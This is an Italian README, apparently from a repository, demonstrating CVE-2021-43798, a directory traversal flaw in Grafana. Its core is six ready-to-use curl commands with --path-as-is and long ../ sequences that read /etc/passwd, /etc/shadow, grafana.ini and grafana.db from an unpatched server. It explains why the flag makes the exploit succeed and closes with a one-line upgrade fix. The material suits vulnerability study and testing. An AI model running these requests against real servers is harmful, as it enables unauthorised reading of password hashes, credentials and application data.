
Questo repository dimostra lo sfruttamento di CVE-2021-43798, una vulnerabilità di directory traversal in Grafana. Questa vulnerabilità consente agli attaccanti di leggere file arbitrari sul server.
Per sfruttare la vulnerabilità manualmente, puoi utilizzare uno dei seguenti comandi curl per tentare di leggere file sensibili:
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"
Nel contesto dello sfruttamento della vulnerabilità di directory traversal CVE-2021-43798 di Grafana, l'opzione --path-as-is è essenziale perché consente di inviare direttamente al server, senza modifiche, le sequenze di traversal appositamente create (../../../../../). Questo può portare all'accesso a file sensibili sul server che si trovano al di fuori della directory prevista.
Senza --path-as-is, curl potrebbe normalizzare il percorso in qualcosa come /public/plugins/Users/install.txt, che non sfrutterebbe la vulnerabilità. Utilizzando --path-as-is, l'esatta sequenza di traversal viene preservata, consentendo all'exploit di avere successo.
Puoi trovare maggiori dettagli sull'opzione --path-as-is nella documentazione di curl. Comprendendo e utilizzando --path-as-is, i professionisti della sicurezza e i ricercatori possono dimostrare e testare efficacemente le vulnerabilità di directory traversal nelle applicazioni web.
Per mitigare questa vulnerabilità, aggiorna Grafana alla versione 8.3.1 o successiva.